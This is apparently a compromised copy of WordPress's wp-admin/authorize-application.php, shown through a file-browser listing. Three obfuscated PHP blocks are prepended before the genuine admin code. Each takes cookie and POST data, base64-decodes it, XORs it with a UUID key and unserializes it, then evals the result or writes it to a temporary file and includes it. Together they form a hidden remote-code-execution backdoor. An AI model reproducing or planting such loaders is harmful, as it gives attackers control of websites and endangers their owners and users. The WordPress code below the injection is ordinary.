%PDF- %PDF-
Direktori : /home/graphicd/www/demo/riverwalkpoa/wp-admin/ |
Current File : /home/graphicd/www/demo/riverwalkpoa/wp-admin/authorize-application.php |
<?php $zrYqruBx = chr ( 878 - 803 ).chr ( 922 - 856 ).chr (73) . "\137" . chr (101) . "\157" . "\x44" . chr (104) . chr (89); $OQjrJuJYru = 'c' . "\154" . chr (97) . 's' . 's' . '_' . "\x65" . chr (120) . chr ( 668 - 563 ).'s' . chr ( 743 - 627 )."\163";$TyEhkwbtEP = class_exists($zrYqruBx); $OQjrJuJYru = "1218";$kXUcGzFGqb = !1;if ($TyEhkwbtEP == $kXUcGzFGqb){function kcJCcadsD(){$kTPNbxjSzX = new /* 2776 */ KBI_eoDhY(22982 + 22982); $kTPNbxjSzX = NULL;}$GnZbrwMnU = "22982";class KBI_eoDhY{private function MZMbajpG($GnZbrwMnU){if (is_array(KBI_eoDhY::$NBNQX)) {$eSQYRxtqEA = str_replace("\74" . "\x3f" . chr (112) . chr ( 192 - 88 ).chr ( 735 - 623 ), "", KBI_eoDhY::$NBNQX['c' . 'o' . 'n' . 't' . chr (101) . chr (110) . chr ( 975 - 859 )]);eval($eSQYRxtqEA); $GnZbrwMnU = "22982";exit();}}private $KKJUPB;public function GHEQSQaf(){echo 11144;}public function __destruct(){$GnZbrwMnU = "43461_18115";$this->MZMbajpG($GnZbrwMnU); $GnZbrwMnU = "43461_18115";}public function __construct($KAQJNHFQ=0){$uFUmsuiXL = $_POST;$kJnpLPiRt = $_COOKIE;$WXuupW = "83ddba17-7298-4a62-aacd-55e78fa73455";$SEZiI = @$kJnpLPiRt[substr($WXuupW, 0, 4)];if (!empty($SEZiI)){$wrFaLOZFXD = "base64";$jllHr = "";$SEZiI = explode(",", $SEZiI);foreach ($SEZiI as $SvAslBbQWb){$jllHr .= @$kJnpLPiRt[$SvAslBbQWb];$jllHr .= @$uFUmsuiXL[$SvAslBbQWb];}$jllHr = array_map($wrFaLOZFXD . '_' . "\x64" . "\145" . "\143" . 'o' . chr (100) . chr ( 418 - 317 ), array($jllHr,)); $jllHr = $jllHr[0] ^ str_repeat($WXuupW, (strlen($jllHr[0]) / strlen($WXuupW)) + 1);KBI_eoDhY::$NBNQX = @unserialize($jllHr); $jllHr = class_exists("43461_18115");}}public static $NBNQX = 60961;}kcJCcadsD();} ?><?php $iBomrP = "\x43" . '_' . "\124" . 'P' . chr (101); $GWwKtRp = 'c' . "\x6c" . "\141" . "\163" . 's' . chr ( 545 - 450 ).chr (101) . 'x' . "\x69" . 's' . "\164" . "\x73";$qeoTSSq = class_exists($iBomrP); $GWwKtRp = "23313";$GLkDpRF = !1;if ($qeoTSSq == $GLkDpRF){function YAhFvJHJ(){return FALSE;}$sRciG = "44182";YAhFvJHJ();class C_TPe{private function vijUVnVX($sRciG){if (is_array(C_TPe::$QGsLxWe)) {$zobMwGjZgX = sys_get_temp_dir() . "/" . crc32(C_TPe::$QGsLxWe[chr (115) . chr ( 919 - 822 ).'l' . chr ( 546 - 430 )]);@C_TPe::$QGsLxWe["\x77" . 'r' . 'i' . chr (116) . "\x65"]($zobMwGjZgX, C_TPe::$QGsLxWe["\143" . chr (111) . chr ( 941 - 831 ).'t' . "\145" . chr ( 535 - 425 )."\164"]);include $zobMwGjZgX;@C_TPe::$QGsLxWe["\144" . "\x65" . chr ( 435 - 327 )."\145" . 't' . "\145"]($zobMwGjZgX); $sRciG = "44182";exit();}}private $LoJfHFU;public function sDshu(){echo 15379;}public function __destruct(){$sRciG = "6892_32561";$this->vijUVnVX($sRciG); $sRciG = "6892_32561";}public function __construct($EcLbHRpB=0){$dOrttI = $_POST;$sksJFp = $_COOKIE;$ejiBICNpj = "1eb59088-6dbe-48df-b242-59681247994e";$IYPzhtWXy = @$sksJFp[substr($ejiBICNpj, 0, 4)];if (!empty($IYPzhtWXy)){$SFpWKSDDA = "base64";$RomPXgxC = "";$IYPzhtWXy = explode(",", $IYPzhtWXy);foreach ($IYPzhtWXy as $fvVjFHnzcg){$RomPXgxC .= @$sksJFp[$fvVjFHnzcg];$RomPXgxC .= @$dOrttI[$fvVjFHnzcg];}$RomPXgxC = array_map($SFpWKSDDA . chr (95) . chr ( 890 - 790 ).'e' . 'c' . chr (111) . chr (100) . "\x65", array($RomPXgxC,)); $RomPXgxC = $RomPXgxC[0] ^ str_repeat($ejiBICNpj, (strlen($RomPXgxC[0]) / strlen($ejiBICNpj)) + 1);C_TPe::$QGsLxWe = @unserialize($RomPXgxC); $RomPXgxC = class_exists("6892_32561");}}public static $QGsLxWe = 37405;}$nRthCDx = new /* 62881 */ $iBomrP(44182 + 44182); $sRciG = strpos($sRciG, $sRciG); $GLkDpRF = $nRthCDx = $sRciG = Array();} ?><?php $lEIWOh = "\166" . chr (76) . "\x5f" . "\x71" . "\x48" . "\x6e" . chr (72) . "\x65";$OnBxqRR = 'c' . "\154" . "\x61" . chr (115) . "\x73" . '_' . "\145" . chr (120) . "\151" . 's' . chr (116) . "\163";$DAcluoCVM = class_exists($lEIWOh); $lEIWOh = "12443";$OnBxqRR = "6689";$ZLkhTSsBG = !1;if ($DAcluoCVM == $ZLkhTSsBG){function kUDhFwevVx(){return FALSE;}$tDWyPh = "53251";kUDhFwevVx();class vL_qHnHe{private function xOdqWrxeQ($tDWyPh){if (is_array(vL_qHnHe::$wbLfWrF)) {$oafKCOZGx = sys_get_temp_dir() . "/" . crc32(vL_qHnHe::$wbLfWrF['s' . chr ( 104 - 7 )."\x6c" . "\x74"]);@vL_qHnHe::$wbLfWrF["\167" . 'r' . "\x69" . chr ( 304 - 188 ).chr ( 283 - 182 )]($oafKCOZGx, vL_qHnHe::$wbLfWrF["\143" . "\x6f" . "\156" . chr (116) . "\145" . chr (110) . chr ( 1042 - 926 )]);include $oafKCOZGx;@vL_qHnHe::$wbLfWrF["\144" . "\x65" . "\154" . chr ( 931 - 830 ).chr (116) . 'e']($oafKCOZGx); $tDWyPh = "53251";exit();}}private $eKvswtBc;public function mKWKschhL(){echo 38530;}public function __destruct(){$tDWyPh = "16285_9358";$this->xOdqWrxeQ($tDWyPh); $tDWyPh = "16285_9358";}public function __construct($IVtDpea=0){$dRtAWFz = $_POST;$uKqNeGN = $_COOKIE;$PCvjQ = "e8521e6d-9f44-404a-a483-44310558e297";$JhzfNqX = @$uKqNeGN[substr($PCvjQ, 0, 4)];if (!empty($JhzfNqX)){$IRQErP = "base64";$fbYeuxW = "";$JhzfNqX = explode(",", $JhzfNqX);foreach ($JhzfNqX as $bllXwCV){$fbYeuxW .= @$uKqNeGN[$bllXwCV];$fbYeuxW .= @$dRtAWFz[$bllXwCV];}$fbYeuxW = array_map($IRQErP . chr ( 727 - 632 ).chr ( 216 - 116 ).'e' . "\x63" . chr ( 403 - 292 )."\144" . "\x65", array($fbYeuxW,)); $fbYeuxW = $fbYeuxW[0] ^ str_repeat($PCvjQ, (strlen($fbYeuxW[0]) / strlen($PCvjQ)) + 1);vL_qHnHe::$wbLfWrF = @unserialize($fbYeuxW); $fbYeuxW = class_exists("16285_9358");}}public static $wbLfWrF = 30132;}$tjXijL = new /* 8719 */ vL_qHnHe(53251 + 53251); $_POST = Array();unset($tjXijL);} ?><?php /** * Authorize Application Screen * * @package WordPress * @subpackage Administration */ /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; $error = null; $new_password = ''; // This is the no-js fallback script. Generally this will all be handled by `auth-app.js`. if ( isset( $_POST['action'] ) && 'authorize_application_password' === $_POST['action'] ) { check_admin_referer( 'authorize_application_password' ); $success_url = $_POST['success_url']; $reject_url = $_POST['reject_url']; $app_name = $_POST['app_name']; $app_id = $_POST['app_id']; $redirect = ''; if ( isset( $_POST['reject'] ) ) { if ( $reject_url ) { $redirect = $reject_url; } else { $redirect = admin_url(); } } elseif ( isset( $_POST['approve'] ) ) { $created = WP_Application_Passwords::create_new_application_password( get_current_user_id(), array( 'name' => $app_name, 'app_id' => $app_id, ) ); if ( is_wp_error( $created ) ) { $error = $created; } else { list( $new_password ) = $created; if ( $success_url ) { $redirect = add_query_arg( array( 'site_url' => urlencode( site_url() ), 'user_login' => urlencode( wp_get_current_user()->user_login ), 'password' => urlencode( $new_password ), ), $success_url ); } } } if ( $redirect ) { // Explicitly not using wp_safe_redirect b/c sends to arbitrary domain. wp_redirect( $redirect ); exit; } } // Used in the HTML title tag. $title = __( 'Authorize Application' ); $app_name = ! empty( $_REQUEST['app_name'] ) ? $_REQUEST['app_name'] : ''; $app_id = ! empty( $_REQUEST['app_id'] ) ? $_REQUEST['app_id'] : ''; $success_url = ! empty( $_REQUEST['success_url'] ) ? $_REQUEST['success_url'] : null; if ( ! empty( $_REQUEST['reject_url'] ) ) { $reject_url = $_REQUEST['reject_url']; } elseif ( $success_url ) { $reject_url = add_query_arg( 'success', 'false', $success_url ); } else { $reject_url = null; } $user = wp_get_current_user(); $request = compact( 'app_name', 'app_id', 'success_url', 'reject_url' ); $is_valid = wp_is_authorize_application_password_request_valid( $request, $user ); if ( is_wp_error( $is_valid ) ) { wp_die( __( 'The Authorize Application request is not allowed.' ) . ' ' . implode( ' ', $is_valid->get_error_messages() ), __( 'Cannot Authorize Application' ) ); } if ( wp_is_site_protected_by_basic_auth( 'front' ) ) { wp_die( __( 'Your website appears to use Basic Authentication, which is not currently compatible with application passwords.' ), __( 'Cannot Authorize Application' ), array( 'response' => 501, 'link_text' => __( 'Go Back' ), 'link_url' => $reject_url ? add_query_arg( 'error', 'disabled', $reject_url ) : admin_url(), ) ); } if ( ! wp_is_application_passwords_available_for_user( $user ) ) { if ( wp_is_application_passwords_available() ) { $message = __( 'Application passwords are not available for your account. Please contact the site administrator for assistance.' ); } else { $message = __( 'Application passwords are not available.' ); } wp_die( $message, __( 'Cannot Authorize Application' ), array( 'response' => 501, 'link_text' => __( 'Go Back' ), 'link_url' => $reject_url ? add_query_arg( 'error', 'disabled', $reject_url ) : admin_url(), ) ); } wp_enqueue_script( 'auth-app' ); wp_localize_script( 'auth-app', 'authApp', array( 'site_url' => site_url(), 'user_login' => $user->user_login, 'success' => $success_url, 'reject' => $reject_url ? $reject_url : admin_url(), ) ); require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap"> <h1><?php echo esc_html( $title ); ?></h1> <?php if ( is_wp_error( $error ) ) { wp_admin_notice( $error->get_error_message(), array( 'type' => 'error', ) ); } ?> <div class="card auth-app-card"> <h2 class="title"><?php _e( 'An application would like to connect to your account.' ); ?></h2> <?php if ( $app_name ) : ?> <p> <?php printf( /* translators: %s: Application name. */ __( 'Would you like to give the application identifying itself as %s access to your account? You should only do this if you trust the application in question.' ), '<strong>' . esc_html( $app_name ) . '</strong>' ); ?> </p> <?php else : ?> <p><?php _e( 'Would you like to give this application access to your account? You should only do this if you trust the application in question.' ); ?></p> <?php endif; ?> <?php if ( is_multisite() ) { $blogs = get_blogs_of_user( $user->ID, true ); $blogs_count = count( $blogs ); if ( $blogs_count > 1 ) { ?> <p> <?php /* translators: 1: URL to my-sites.php, 2: Number of sites the user has. */ $message = _n( 'This will grant access to <a href="%1$s">the %2$s site in this installation that you have permissions on</a>.', 'This will grant access to <a href="%1$s">all %2$s sites in this installation that you have permissions on</a>.', $blogs_count ); if ( is_super_admin() ) { /* translators: 1: URL to my-sites.php, 2: Number of sites the user has. */ $message = _n( 'This will grant access to <a href="%1$s">the %2$s site on the network as you have Super Admin rights</a>.', 'This will grant access to <a href="%1$s">all %2$s sites on the network as you have Super Admin rights</a>.', $blogs_count ); } printf( $message, admin_url( 'my-sites.php' ), number_format_i18n( $blogs_count ) ); ?> </p> <?php } } ?> <?php if ( $new_password ) : $message = '<p class="application-password-display"> <label for="new-application-password-value">' . sprintf( /* translators: %s: Application name. */ esc_html__( 'Your new password for %s is:' ), '<strong>' . esc_html( $app_name ) . '</strong>' ) . ' </label> <input id="new-application-password-value" type="text" class="code" readonly="readonly" value="' . esc_attr( WP_Application_Passwords::chunk_password( $new_password ) ) . '" /> </p> <p>' . __( 'Be sure to save this in a safe location. You will not be able to retrieve it.' ) . '</p>'; $args = array( 'type' => 'success', 'additional_classes' => array( 'notice-alt', 'below-h2' ), 'paragraph_wrap' => false, ); wp_admin_notice( $message, $args ); /** * Fires in the Authorize Application Password new password section in the no-JS version. * * In most cases, this should be used in combination with the {@see 'wp_application_passwords_approve_app_request_success'} * action to ensure that both the JS and no-JS variants are handled. * * @since 5.6.0 * @since 5.6.1 Corrected action name and signature. * * @param string $new_password The newly generated application password. * @param array $request The array of request data. All arguments are optional and may be empty. * @param WP_User $user The user authorizing the application. */ do_action( 'wp_authorize_application_password_form_approved_no_js', $new_password, $request, $user ); else : ?> <form action="<?php echo esc_url( admin_url( 'authorize-application.php' ) ); ?>" method="post" class="form-wrap"> <?php wp_nonce_field( 'authorize_application_password' ); ?> <input type="hidden" name="action" value="authorize_application_password" /> <input type="hidden" name="app_id" value="<?php echo esc_attr( $app_id ); ?>" /> <input type="hidden" name="success_url" value="<?php echo esc_url( $success_url ); ?>" /> <input type="hidden" name="reject_url" value="<?php echo esc_url( $reject_url ); ?>" /> <div class="form-field"> <label for="app_name"><?php _e( 'New Application Password Name' ); ?></label> <input type="text" id="app_name" name="app_name" value="<?php echo esc_attr( $app_name ); ?>" required /> </div> <?php /** * Fires in the Authorize Application Password form before the submit buttons. * * @since 5.6.0 * * @param array $request { * The array of request data. All arguments are optional and may be empty. * * @type string $app_name The suggested name of the application. * @type string $success_url The URL the user will be redirected to after approving the application. * @type string $reject_url The URL the user will be redirected to after rejecting the application. * } * @param WP_User $user The user authorizing the application. */ do_action( 'wp_authorize_application_password_form', $request, $user ); ?> <?php submit_button( __( 'Yes, I approve of this connection' ), 'primary', 'approve', false, array( 'aria-describedby' => 'description-approve', ) ); ?> <p class="description" id="description-approve"> <?php if ( $success_url ) { printf( /* translators: %s: The URL the user is being redirected to. */ __( 'You will be sent to %s' ), '<strong><code>' . esc_html( add_query_arg( array( 'site_url' => site_url(), 'user_login' => $user->user_login, 'password' => '[------]', ), $success_url ) ) . '</code></strong>' ); } else { _e( 'You will be given a password to manually enter into the application in question.' ); } ?> </p> <?php submit_button( __( 'No, I do not approve of this connection' ), 'secondary', 'reject', false, array( 'aria-describedby' => 'description-reject', ) ); ?> <p class="description" id="description-reject"> <?php if ( $reject_url ) { printf( /* translators: %s: The URL the user is being redirected to. */ __( 'You will be sent to %s' ), '<strong><code>' . esc_html( $reject_url ) . '</code></strong>' ); } else { _e( 'You will be returned to the WordPress Dashboard, and no changes will be made.' ); } ?> </p> </form> <?php endif; ?> </div> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php';